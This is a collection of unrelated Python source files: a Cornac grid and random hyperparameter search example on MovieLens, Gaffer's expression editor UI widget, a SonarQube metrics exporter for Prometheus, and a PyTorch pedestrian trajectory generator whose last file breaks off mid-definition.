# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example for hyper-parameter searching with Matrix Factorization"""
import numpy as np
import cornac
from cornac.datasets import movielens
from cornac.eval_methods import RatioSplit
from cornac.hyperopt import Discrete, Continuous
from cornac.hyperopt import GridSearch, RandomSearch
# Load MovieLens 100K ratings
ml_100k = movielens.load_feedback(variant="100K")
# Define an evaluation method to split feedback into train, validation and test sets
ratio_split = RatioSplit(data=ml_100k, test_size=0.1, val_size=0.1, verbose=True)
# Instantiate MAE and RMSE for evaluation
mae = cornac.metrics.MAE()
rmse = cornac.metrics.RMSE()
# Define a base MF model with fixed hyper-parameters
mf = cornac.models.MF(max_iter=20, learning_rate=0.01, early_stop=True, verbose=True)
# Wrap MF model inside GridSearch along with the searching space
gs_mf = GridSearch(
model=mf,
space=[
Discrete("k", [10, 30, 50]),
Discrete("use_bias", [True, False]),
Discrete("lambda_reg", [1e-1, 1e-2, 1e-3, 1e-4]),
],
metric=rmse,
eval_method=ratio_split,
)
# Wrap MF model inside RandomSearch along with the searching space, try 30 times
rs_mf = RandomSearch(
model=mf,
space=[
Discrete("k", [10, 30, 50]),
Discrete("use_bias", [True, False]),
Continuous("lambda_reg", low=1e-4, high=1e-1),
],
metric=rmse,
eval_method=ratio_split,
n_trails=30,
)
# Put everything together into an experiment and run it
cornac.Experiment(
eval_method=ratio_split,
models=[gs_mf, rs_mf],
metrics=[mae, rmse],
user_based=False,
).run()
|
py | 1a4bc169fdcc1e0f36b2b97d5f9dcce02bbef824 | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferUI
Gaffer.Metadata.registerNode(
Gaffer.Expression,
"description",
"""
Utility node for computing values via
scripted expressions.
""",
"layout:customWidget:Expression:widgetType", "GafferUI.ExpressionUI.ExpressionWidget",
plugs = {
# This plug is added by the expressionCompatibility.py
# config file to provide compatibility for loading old
# files, so we must hide it.
"engine" : (
"plugValueWidget:type", "",
"nodule:type", "",
),
# This plug is added by the expressionCompatibility.py
# config file to provide compatibility for loading old
# files, so we must hide it.
"expression" : (
"plugValueWidget:type", "",
"nodule:type", "",
),
"user" : (
"plugValueWidget:type", "",
),
}
)
# PlugValueWidget popup menu for creating expressions
##########################################################################
def __createExpression( plug, language ) :
node = plug.node()
parentNode = node.ancestor( Gaffer.Node )
with Gaffer.UndoScope( node.scriptNode() ) :
expressionNode = Gaffer.Expression()
parentNode.addChild( expressionNode )
expressionNode.setExpression(
Gaffer.Expression.defaultExpression( plug, language ),
language
)
__editExpression( plug )
def __editExpression( plug ) :
expressionNode = plug.getInput().node()
GafferUI.NodeEditor.acquire( expressionNode )
def __popupMenu( menuDefinition, plugValueWidget ) :
plug = plugValueWidget.getPlug()
if not isinstance( plug, Gaffer.ValuePlug ) :
return
node = plug.node()
if node is None or node.parent() is None :
return
input = plug.getInput()
if input is not None or not plugValueWidget._editable() or Gaffer.MetadataAlgo.readOnly( plug ) :
return
languages = [ l for l in Gaffer.Expression.languages() if Gaffer.Expression.defaultExpression( plug, l ) ]
if not languages :
return
menuDefinition.prepend( "/ExpressionDivider", { "divider" : True } )
for language in languages :
menuDefinition.prepend(
"/Create " + IECore.CamelCase.toSpaced( language ) + " Expression...",
{
"command" : functools.partial( __createExpression, plug, language )
}
)
__popupMenuConnection = GafferUI.PlugValueWidget.popupMenuSignal().connect( __popupMenu )
# ExpressionWidget
##########################################################################
class ExpressionWidget( GafferUI.Widget ) :
def __init__( self, node, **kw ) :
column = GafferUI.ListContainer( spacing = 4 )
GafferUI.Widget.__init__( self, column, **kw )
self.__node = node
with column :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :
GafferUI.Label( "Language" )
self.__languageMenu = GafferUI.MenuButton( "", menu = GafferUI.Menu( Gaffer.WeakMethod( self.__languageMenuDefinition ) ) )
self.__languageMenu.setEnabled( not Gaffer.MetadataAlgo.readOnly( node ) )
self.__textWidget = GafferUI.MultiLineTextWidget( role = GafferUI.MultiLineTextWidget.Role.Code )
self.__textWidget.setEditable( not Gaffer.MetadataAlgo.readOnly( node ) )
self.__activatedConnection = self.__textWidget.activatedSignal().connect( Gaffer.WeakMethod( self.__activated ) )
self.__editingFinishedConnection = self.__textWidget.editingFinishedSignal().connect( Gaffer.WeakMethod( self.__editingFinished ) )
self.__dropTextConnection = self.__textWidget.dropTextSignal().connect( Gaffer.WeakMethod( self.__dropText ) )
self.__contextMenuConnection = self.__textWidget.contextMenuSignal().connect( Gaffer.WeakMethod( self.__expressionContextMenu ) )
self.__messageWidget = GafferUI.MessageWidget()
self.__expressionChangedConnection = self.__node.expressionChangedSignal().connect( Gaffer.WeakMethod( self.__expressionChanged ) )
self.__errorConnection = self.__node.errorSignal().connect( Gaffer.WeakMethod( self.__error ) )
self.__update()
def node( self ) :
return self.__node
def textWidget( self ) :
return self.__textWidget
__expressionContextMenuSignal = Gaffer.Signal2()
## This signal is emitted whenever a popup menu
# for an ExpressionWidget is about to be shown.
# This provides an opportunity to customise the
# menu from external code. The signature for
# slots is ( menuDefinition, widget ), and slots
# should just modify the menu definition in place.
@classmethod
def expressionContextMenuSignal( cls ) :
return cls.__expressionContextMenuSignal
def __expressionContextMenuDefinition( self ) :
menuDefinition = IECore.MenuDefinition()
bookmarks = Gaffer.MetadataAlgo.bookmarks( self.__node.parent() )
def __bookmarkMenu( bookmarks ) :
bookmarkMenuDefinition = IECore.MenuDefinition()
def __walk( graphComponent, result ) :
if (
isinstance( graphComponent, Gaffer.ValuePlug ) and
self.__node.identifier( graphComponent ) and
not graphComponent.relativeName( graphComponent.node() ).startswith( "__" )
) :
result.append( graphComponent )
for c in graphComponent.children( Gaffer.Plug ) :
__walk( c, result )
for bookmark in bookmarks :
compatiblePlugs = []
__walk( bookmark, compatiblePlugs )
if not compatiblePlugs :
continue
for plug in compatiblePlugs :
label = "/" + bookmark.getName()
if len( compatiblePlugs ) > 1 :
label += "/" + plug.relativeName( bookmark )
bookmarkMenuDefinition.append(
label,
{
"command" : functools.partial( self.__textWidget.insertText, self.__node.identifier( plug ) ),
"active" : self.__textWidget.getEditable() and not Gaffer.MetadataAlgo.readOnly( self.__node['__expression'] ),
}
)
return bookmarkMenuDefinition
menuDefinition.append( "/Insert Bookmark", { "subMenu" : functools.partial( __bookmarkMenu, bookmarks ) } )
self.expressionContextMenuSignal()( menuDefinition, self )
return menuDefinition
def __expressionContextMenu( self, *unused ) :
menuDefinition = self.__expressionContextMenuDefinition()
if not len( menuDefinition.items() ) :
return False
title = self.__node.relativeName( self.__node.scriptNode() )
title = ".".join( [ IECore.CamelCase.join( IECore.CamelCase.split( x ) ) for x in title.split( "." ) ] )
self.____expressionContextMenu = GafferUI.Menu( menuDefinition, title = title )
self.____expressionContextMenu.popup()
return True
def __update( self ) :
expression = self.__node.getExpression()
self.__textWidget.setText( expression[0] )
self.__languageMenu.setText( IECore.CamelCase.toSpaced( expression[1] ) )
self.__messageWidget.clear()
self.__messageWidget.setVisible( False )
def __languageMenuDefinition( self ) :
currentLanguage = self.__node.getExpression()[1]
result = IECore.MenuDefinition()
for language in self.__node.languages() :
result.append(
"/" + IECore.CamelCase.toSpaced( language ),
{
"command" : functools.partial( Gaffer.WeakMethod( self.__changeLanguage ), language = language ),
"checkBox" : language == currentLanguage,
}
)
return result
def __changeLanguage( self, unused, language ) :
## \todo Can we do better? Maybe start with the default expression
# for the current output plugs?
self.__node.setExpression( "", language )
def __setExpression( self ) :
language = self.__node.getExpression()[1]
with Gaffer.UndoScope( self.__node.scriptNode() ) :
try :
self.__node.setExpression( self.__textWidget.getText(), language )
self.__messageWidget.setVisible( False )
except Exception as e :
self.__messageWidget.clear()
self.__messageWidget.setVisible( True )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error, "Parse error", str( e )
)
def __expressionChanged( self, node ) :
self.__update()
def __activated( self, widget ) :
self.__setExpression()
def __editingFinished( self, widget ) :
self.__setExpression()
def __dropText( self, widget, dragData ) :
if isinstance( dragData, IECore.StringVectorData ) :
return repr( list( dragData ) )
elif isinstance( dragData, Gaffer.Plug ) :
name = self.__node.identifier( dragData )
return name if name else None
elif isinstance( dragData, Gaffer.Set ) :
if len( dragData ) == 1 :
return self.__dropText( widget, dragData[0] )
else :
return None
return None
# An error in the expression could occur during a compute triggered by a repaint.
# ( For example, if a user uses an expression to drive Backdrop text )
# If we forced a repaint right away, this would be a recursive repaint which could cause
# a Qt crash, so we wait for idle.
@GafferUI.LazyMethod()
def __error( self, plug, source, error ) :
self.__messageWidget.setVisible( True )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Error, "Execution error", error )
|
py | 1a4bc2c8da014f78499795b5db1d39dddc33b939 | import requests
import logging
from .config import Config
from prometheus_client.core import Gauge
import base64
CONF = Config()
class SonarQubeClient:
def __init__(self, url, user_token, **kwargs):
if url.endswith("/"):
url = url[:-1]
self._url = url
self._user_token = user_token
self._basic_authen = base64.b64encode(("%s:" % self._user_token).encode("ascii")).decode("ascii")
self._authenticate_header = {"Authorization": "Basic %s" % self._basic_authen}
self._kwargs = kwargs
logging.debug("Initialized SonarQube: url: %s, userToken: ****, %s" % (self._url, self._kwargs))
def _request(self, endpoint):
res = requests.get("{}/{}".format(self._url, endpoint), headers=self._authenticate_header, **self._kwargs)
res.raise_for_status()
return res.json()
def get_projects(self, page_index=1, page_size=100):
return self._request(endpoint="api/components/search?qualifiers=TRK&p={}&ps={}".format(page_index, page_size))
def get_metrics(self):
return self._request(endpoint="api/metrics/search")
def get_measures(self, component_key, metric_key):
return self._request(endpoint="api/measures/component?component={}&metricKeys={}".format(component_key, metric_key))
class Metric:
def __init__(self):
self._key = None
self._values = []
self._description = None
self._domain = None
self._type = None
self._tranform = False
self._tranform_map = {}
@property
def key(self):
return self._key
@key.setter
def key(self, value):
self._key = value
@property
def values(self):
return self._values
@values.setter
def values(self, value):
self._values.extend(value)
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def domain(self):
return self._domain
@domain.setter
def domain(self, value):
self._domain = value
@property
def type(self):
return self._type
@type.setter
def type(self, value):
self._type = value
@property
def tranform(self):
return self._tranform
@tranform.setter
def tranform(self, value):
self._tranform = value
@property
def tranform_map(self):
return self._tranform_map
@tranform_map.setter
def tranform_map(self, value):
self._tranform_map = value
class SonarQubeCollector:
def __init__(self, sonar_client : SonarQubeClient):
self._sonar_client = sonar_client
self._cached_metrics = []
# initialize gauges
logging.info("Intitializing...")
self._metrics = {}
raw_metrics = self._sonar_client.get_metrics()["metrics"]
for raw_metric in raw_metrics:
metric = Metric()
for supported_m in CONF.supported_keys:
if "domain" in raw_metric and raw_metric["domain"] == supported_m["domain"] and raw_metric["key"] in supported_m["keys"]:
metric.domain = raw_metric["domain"]
metric.key = raw_metric["key"]
metric.type = raw_metric["type"]
if "description" in raw_metric:
metric.description = raw_metric["description"]
else:
metric.description = raw_metric["name"]
if "tranformKeys" in supported_m and raw_metric["key"] in supported_m["tranformKeys"].keys():
metric.tranform = True
metric.tranform_map = supported_m["tranformKeys"][raw_metric["key"]]
self._metrics[metric.key] = metric
self._queried_metrics = str()
self._gauges = {}
for _, m in self._metrics.items():
if m.tranform:
self._gauges[m.key] = Gauge (name="sonar_{}".format(m.key), documentation=m.description, labelnames=("key", "name", "domain", "type", "value"))
else:
self._gauges[m.key] = Gauge (name="sonar_{}".format(m.key), documentation=m.description, labelnames=("key", "name", "domain", "type"))
self._queried_metrics = "{},{}".format(m.key, self._queried_metrics)
logging.info("Initialized %s metrics." % len(self._metrics.keys()))
def collect(self):
return self._cached_metrics
def run(self):
logging.info("Collecting data from SonarQube...")
response = self._sonar_client.get_projects()
total_projects = int(response['paging']['total'])
logging.info("There are %s projects in SonarQube" % total_projects)
processed_projects = 0
page_index = 1
while processed_projects < total_projects:
projects = self._sonar_client.get_projects(page_index=page_index)["components"]
for p in projects:
measures = self._sonar_client.get_measures(component_key=p["key"], metric_key=self._queried_metrics)["component"]["measures"]
for measure in measures:
m = self._metrics[measure["metric"]]
value = measure["value"]
gauge = self._gauges[measure["metric"]]
if m.tranform:
value = m.tranform_map[measure["value"]]
gauge.labels(p["key"], p["name"], m.domain, m.type, measure["value"]).set(value)
else:
gauge.labels(p["key"], p["name"], m.domain, m.type).set(value)
processed_projects += 1
page_index += 1
logging.info("{} projects were processed, {} project remaining".format(processed_projects, (total_projects - processed_projects)))
data = []
for key, g in self._gauges.items():
data.extend(g.collect())
self._cached_metrics = data
logging.info("SonarQube's data collected")
|
py | 1a4bc33ac7343d5e0f210057abb1c6a8fba1d7ef | import torch
import torch.nn as nn
import math
from torch.autograd import Variable
def make_mlp(dim_list, activation='relu', batch_norm=True, dropout=0):
layers = []
# batch_norm=True
dropout=0.25
for dim_in, dim_out in zip(dim_list[:-1], dim_list[1:]):
layers.append(nn.Linear(dim_in, dim_out))
if batch_norm:
layers.append(nn.BatchNorm1d(dim_out))
if activation == 'relu':
layers.append(nn.ReLU())
elif activation == 'leakyrelu':
layers.append(nn.LeakyReLU())
if dropout > 0:
layers.append(nn.Dropout(p=dropout))
return nn.Sequential(*layers)
def get_noise(shape, noise_type):
if noise_type == 'gaussian':
return torch.randn(*shape).cuda()
elif noise_type == 'uniform':
return torch.rand(*shape).sub_(0.5).mul_(2.0).cuda()
raise ValueError('Unrecognized noise type "%s"' % noise_type)
class PositionalEncoding(nn.Module):
"Implement the PE function."
def __init__(self, embedding_dim, dropout=0, obs_len=8):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
# Compute the positional encodings once in log space.
pe = torch.zeros(obs_len, embedding_dim)
position = torch.arange(0, obs_len).unsqueeze(1)
div_term = torch.exp(torch.arange(0, embedding_dim, 2) *
-(math.log(100.0) / embedding_dim))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + Variable(self.pe,
requires_grad=False)
return self.dropout(x)
class Encoder(nn.Module):
"""Encoder is part of both TrajectoryGenerator and
TrajectoryDiscriminator"""
def __init__(
self, embedding_dim=64, h_dim=64, mlp_dim=1024, num_layers=1, obs_len=8,
dropout=0.0, pos_embed_flag=True
):
super(Encoder, self).__init__()
self.pos_embed = PositionalEncoding(embedding_dim)
self.h_dim = h_dim
self.embedding_dim = embedding_dim
self.num_layers = num_layers
self.pos_embed_flag = pos_embed_flag
# self.encoder = nn.LSTM(
# embedding_dim, h_dim, num_layers, dropout=dropout
# )
##TO DO Encoder -- Feedforward
# self.encoder = nn.Sequential(nn.Linear(embedding_dim*obs_len, h_dim*8), nn.Dropout(p=0.25), nn.Linear(h_dim*8, h_dim))
self.encoder = nn.Sequential(nn.Linear(embedding_dim*obs_len, h_dim), nn.Dropout(p=0.0))
self.spatial_embedding = nn.Linear(2, embedding_dim)
# def init_hidden(self, batch):
# return (
# torch.zeros(self.num_layers, batch, self.h_dim).cuda(),
# torch.zeros(self.num_layers, batch, self.h_dim).cuda()
# )
def forward(self, obs_traj):
"""
Inputs:
- obs_traj: Tensor of shape (obs_len, batch, 2)
Output:
- final_h: Tensor of shape (self.num_layers, batch, self.h_dim)
"""
# Encode observed Trajectory
batch = obs_traj.size(1)
obs_len = obs_traj.size(0)
##obs_traj --> (obs_len, batch, 2)
obs_traj_embedding = self.spatial_embedding(obs_traj.contiguous().view(-1, 2))
##obs_traj_embedding --> (obs_len * batch, embedding)
obs_traj_embedding = obs_traj_embedding.view(-1, batch, self.embedding_dim)
##obs_traj_embedding --> (obs_len, batch, embedding)
obs_traj_embedding = obs_traj_embedding.permute(1, 0, 2)
##obs_traj_embedding --> (batch, obs_len, embedding)
if self.pos_embed_flag:
# print("Embedding")
obs_traj_embedding = self.pos_embed(obs_traj_embedding)
obs_coord_embedding = obs_traj_embedding.contiguous().view(batch, -1)
## CAN ADD POSITION EMBEDDING HERE
## TO DO
hidden = self.encoder(obs_coord_embedding)
# hidden = output.view(batch, obs_len, -1)
# state_tuple = self.init_hidden(batch)
# output, state = self.encoder(obs_traj_embedding, state_tuple)
# final_h = state[0]
return hidden
class Decoder(nn.Module):
"""Decoder is part of TrajectoryGenerator"""
def __init__(
self, seq_len, obs_len=8, embedding_dim=64, h_dim=128, mlp_dim=1024, num_layers=1,
pool_every_timestep=True, dropout=0.0, bottleneck_dim=1024,
activation='relu', batch_norm=True, pooling_type='pool_net',
neighborhood_size=2.0, grid_size=8
):
super(Decoder, self).__init__()
self.seq_len = seq_len
self.mlp_dim = mlp_dim
self.h_dim = h_dim
self.embedding_dim = embedding_dim
self.pool_every_timestep = pool_every_timestep
# self.decoder = nn.LSTM(
# embedding_dim, h_dim, num_layers, dropout=dropout
# )
self.decoder = nn.Sequential(nn.Linear(h_dim + embedding_dim, 8*embedding_dim))
if pool_every_timestep:
if pooling_type == 'pool_net':
self.pool_net = PoolHiddenNet(
embedding_dim=self.embedding_dim,
h_dim=self.h_dim,
mlp_dim=mlp_dim,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
elif pooling_type == 'spool':
self.pool_net = SocialPooling(
h_dim=self.h_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout,
neighborhood_size=neighborhood_size,
grid_size=grid_size
)
mlp_dims = [h_dim + bottleneck_dim, mlp_dim, h_dim]
self.mlp = make_mlp(
mlp_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
self.spatial_embedding = nn.Linear(2, embedding_dim)
# self.hidden2pos = nn.Linear(h_dim, 2)
self.hidden2pos = nn.Linear(embedding_dim, 2)
def forward(self, last_pos, last_pos_rel, noise_output, seq_start_end):
"""
Inputs:
- last_pos: Tensor of shape (batch, 2)
- last_pos_rel: Tensor of shape (batch, 2)
- state_tuple: (hh, ch) each tensor of shape (num_layers, batch, h_dim)
- seq_start_end: A list of tuples which delimit sequences within batch
Output:
- pred_traj: tensor of shape (self.seq_len, batch, 2)
"""
pred_len = 8
batch = last_pos.size(0)
pred_traj_fake_rel = []
last_pos_embedding = self.spatial_embedding(last_pos_rel)
decoder_input = torch.cat((noise_output, last_pos_embedding), dim=1)
decoder_output = self.decoder(decoder_input)
decoder_output = decoder_output.contiguous().view(batch, pred_len, -1)
decoder_output = decoder_output.contiguous().view(batch*pred_len, -1)
pred_traj_fake_rel = self.hidden2pos(decoder_output)
pred_traj_fake_rel = pred_traj_fake_rel.contiguous().view(batch, pred_len, 2)
# decoder_input = decoder_input.view(1, batch, self.embedding_dim)
# for _ in range(self.seq_len):
# output, state_tuple = self.decoder(decoder_input, state_tuple)
# rel_pos = self.hidden2pos(output.view(-1, self.h_dim))
# curr_pos = rel_pos + last_pos
# if self.pool_every_timestep:
# decoder_h = state_tuple[0]
# pool_h = self.pool_net(decoder_h, seq_start_end, curr_pos)
# decoder_h = torch.cat(
# [decoder_h.view(-1, self.h_dim), pool_h], dim=1)
# decoder_h = self.mlp(decoder_h)
# decoder_h = torch.unsqueeze(decoder_h, 0)
# state_tuple = (decoder_h, state_tuple[1])
# embedding_input = rel_pos
# decoder_input = self.spatial_embedding(embedding_input)
# decoder_input = decoder_input.view(1, batch, self.embedding_dim)
# pred_traj_fake_rel.append(rel_pos.view(batch, -1))
# last_pos = curr_pos
# pred_traj_fake_rel = torch.stack(pred_traj_fake_rel, dim=0)
return pred_traj_fake_rel
class PoolHiddenNet(nn.Module):
"""Pooling module as proposed in our paper"""
def __init__(
self, embedding_dim=64, h_dim=64, mlp_dim=1024, bottleneck_dim=1024,
activation='relu', batch_norm=True, dropout=0.0
):
super(PoolHiddenNet, self).__init__()
self.mlp_dim = 1024
self.h_dim = h_dim
self.bottleneck_dim = bottleneck_dim
self.embedding_dim = embedding_dim
mlp_pre_dim = embedding_dim + h_dim
mlp_pre_pool_dims = [mlp_pre_dim, 512, bottleneck_dim]
self.spatial_embedding = nn.Linear(2, embedding_dim)
self.mlp_pre_pool = make_mlp(
mlp_pre_pool_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout)
def repeat(self, tensor, num_reps):
"""
Inputs:
-tensor: 2D tensor of any shape
-num_reps: Number of times to repeat each row
Outpus:
-repeat_tensor: Repeat each row such that: R1, R1, R2, R2
"""
col_len = tensor.size(1)
tensor = tensor.unsqueeze(dim=1).repeat(1, num_reps, 1)
tensor = tensor.view(-1, col_len)
return tensor
def forward(self, h_states, seq_start_end, end_pos):
"""
Inputs:
- h_states: Tensor of shape (num_layers, batch, h_dim)
- seq_start_end: A list of tuples which delimit sequences within batch
- end_pos: Tensor of shape (batch, 2)
Output:
- pool_h: Tensor of shape (batch, bottleneck_dim)
"""
pool_h = []
for _, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
num_ped = end - start
curr_hidden = h_states.view(-1, self.h_dim)[start:end]
curr_end_pos = end_pos[start:end]
# Repeat -> H1, H2, H1, H2
curr_hidden_1 = curr_hidden.repeat(num_ped, 1)
# Repeat position -> P1, P2, P1, P2
curr_end_pos_1 = curr_end_pos.repeat(num_ped, 1)
# Repeat position -> P1, P1, P2, P2
curr_end_pos_2 = self.repeat(curr_end_pos, num_ped)
curr_rel_pos = curr_end_pos_1 - curr_end_pos_2
curr_rel_embedding = self.spatial_embedding(curr_rel_pos)
mlp_h_input = torch.cat([curr_rel_embedding, curr_hidden_1], dim=1)
curr_pool_h = self.mlp_pre_pool(mlp_h_input)
curr_pool_h = curr_pool_h.view(num_ped, num_ped, -1).max(1)[0]
pool_h.append(curr_pool_h)
pool_h = torch.cat(pool_h, dim=0)
return pool_h
class SocialPooling(nn.Module):
"""Current state of the art pooling mechanism:
http://cvgl.stanford.edu/papers/CVPR16_Social_LSTM.pdf"""
def __init__(
self, h_dim=64, activation='relu', batch_norm=True, dropout=0.0,
neighborhood_size=2.0, grid_size=8, pool_dim=None
):
super(SocialPooling, self).__init__()
self.h_dim = h_dim
self.grid_size = grid_size
self.neighborhood_size = neighborhood_size
if pool_dim:
mlp_pool_dims = [grid_size * grid_size * h_dim, pool_dim]
else:
mlp_pool_dims = [grid_size * grid_size * h_dim, h_dim]
self.mlp_pool = make_mlp(
mlp_pool_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
def get_bounds(self, ped_pos):
top_left_x = ped_pos[:, 0] - self.neighborhood_size / 2
top_left_y = ped_pos[:, 1] + self.neighborhood_size / 2
bottom_right_x = ped_pos[:, 0] + self.neighborhood_size / 2
bottom_right_y = ped_pos[:, 1] - self.neighborhood_size / 2
top_left = torch.stack([top_left_x, top_left_y], dim=1)
bottom_right = torch.stack([bottom_right_x, bottom_right_y], dim=1)
return top_left, bottom_right
def get_grid_locations(self, top_left, other_pos):
cell_x = torch.floor(
((other_pos[:, 0] - top_left[:, 0]) / self.neighborhood_size) *
self.grid_size)
cell_y = torch.floor(
((top_left[:, 1] - other_pos[:, 1]) / self.neighborhood_size) *
self.grid_size)
grid_pos = cell_x + cell_y * self.grid_size
return grid_pos
def repeat(self, tensor, num_reps):
"""
Inputs:
-tensor: 2D tensor of any shape
-num_reps: Number of times to repeat each row
Outpus:
-repeat_tensor: Repeat each row such that: R1, R1, R2, R2
"""
col_len = tensor.size(1)
tensor = tensor.unsqueeze(dim=1).repeat(1, num_reps, 1)
tensor = tensor.view(-1, col_len)
return tensor
def forward(self, h_states, seq_start_end, end_pos):
"""
Inputs:
- h_states: Tesnsor of shape (num_layers, batch, h_dim)
- seq_start_end: A list of tuples which delimit sequences within batch.
- end_pos: Absolute end position of obs_traj (batch, 2)
Output:
- pool_h: Tensor of shape (batch, h_dim)
"""
pool_h = []
for _, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
num_ped = end - start
grid_size = self.grid_size * self.grid_size
curr_hidden = h_states.view(-1, self.h_dim)[start:end]
curr_hidden_repeat = curr_hidden.repeat(num_ped, 1)
curr_end_pos = end_pos[start:end]
curr_pool_h_size = (num_ped * grid_size) + 1
curr_pool_h = curr_hidden.new_zeros((curr_pool_h_size, self.h_dim))
# curr_end_pos = curr_end_pos.data
top_left, bottom_right = self.get_bounds(curr_end_pos)
# Repeat position -> P1, P2, P1, P2
curr_end_pos = curr_end_pos.repeat(num_ped, 1)
# Repeat bounds -> B1, B1, B2, B2
top_left = self.repeat(top_left, num_ped)
bottom_right = self.repeat(bottom_right, num_ped)
grid_pos = self.get_grid_locations(
top_left, curr_end_pos).type_as(seq_start_end)
# Make all positions to exclude as non-zero
# Find which peds to exclude
x_bound = ((curr_end_pos[:, 0] >= bottom_right[:, 0]) +
(curr_end_pos[:, 0] <= top_left[:, 0]))
y_bound = ((curr_end_pos[:, 1] >= top_left[:, 1]) +
(curr_end_pos[:, 1] <= bottom_right[:, 1]))
within_bound = x_bound + y_bound
within_bound[0::num_ped + 1] = 1 # Don't include the ped itself
within_bound = within_bound.view(-1)
# This is a tricky way to get scatter add to work. Helps me avoid a
# for loop. Offset everything by 1. Use the initial 0 position to
# dump all uncessary adds.
grid_pos += 1
total_grid_size = self.grid_size * self.grid_size
offset = torch.arange(
0, total_grid_size * num_ped, total_grid_size
).type_as(seq_start_end)
offset = self.repeat(offset.view(-1, 1), num_ped).view(-1)
grid_pos += offset
grid_pos[within_bound != 0] = 0
grid_pos = grid_pos.view(-1, 1).expand_as(curr_hidden_repeat)
curr_pool_h = curr_pool_h.scatter_add(0, grid_pos,
curr_hidden_repeat)
curr_pool_h = curr_pool_h[1:]
pool_h.append(curr_pool_h.view(num_ped, -1))
pool_h = torch.cat(pool_h, dim=0)
pool_h = self.mlp_pool(pool_h)
return pool_h
class TrajectoryGenerator(nn.Module):
def __init__(
self, obs_len, pred_len, embedding_dim=64, encoder_h_dim=64,
decoder_h_dim=128, mlp_dim=1024, num_layers=1, noise_dim=(0, ),
noise_type='gaussian', noise_mix_type='ped', pooling_type=None,
pool_every_timestep=True, dropout=0.0, bottleneck_dim=1024,
activation='relu', batch_norm=True, neighborhood_size=2.0, grid_size=8
):
super(TrajectoryGenerator, self).__init__()
if pooling_type and pooling_type.lower() == 'none':
pooling_type = None
self.obs_len = obs_len
self.pred_len = pred_len
self.mlp_dim = mlp_dim
self.encoder_h_dim = encoder_h_dim
self.decoder_h_dim = decoder_h_dim
self.embedding_dim = embedding_dim
self.noise_dim = noise_dim
self.num_layers = num_layers
self.noise_type = noise_type
self.noise_mix_type = noise_mix_type
self.pooling_type = pooling_type
self.noise_first_dim = 0
self.pool_every_timestep = pool_every_timestep
self.bottleneck_dim = 1024
self.encoder = Encoder(
embedding_dim=embedding_dim,
h_dim=encoder_h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
dropout=dropout
)
self.decoder = Decoder(
pred_len,
embedding_dim=embedding_dim,
h_dim=decoder_h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
pool_every_timestep=pool_every_timestep,
dropout=dropout,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm,
pooling_type=pooling_type,
grid_size=grid_size,
neighborhood_size=neighborhood_size
)
if pooling_type == 'pool_net':
self.pool_net = PoolHiddenNet(
embedding_dim=self.embedding_dim,
h_dim=encoder_h_dim,
mlp_dim=mlp_dim,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm
)
elif pooling_type == 'spool':
self.pool_net = SocialPooling(
h_dim=encoder_h_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout,
neighborhood_size=neighborhood_size,
grid_size=grid_size
)
if self.noise_dim == None or self.noise_dim[0] == 0:
self.noise_dim = None
else:
self.noise_first_dim = noise_dim[0]
# Decoder Hidden
if pooling_type:
input_dim = encoder_h_dim + bottleneck_dim
else:
input_dim = encoder_h_dim
# if self.mlp_decoder_needed():
# mlp_decoder_context_dims = [
# input_dim, mlp_dim, decoder_h_dim - self.noise_first_dim
# ]
if self.mlp_decoder_needed():
mlp_decoder_context_dims = [
input_dim, decoder_h_dim - self.noise_first_dim
]
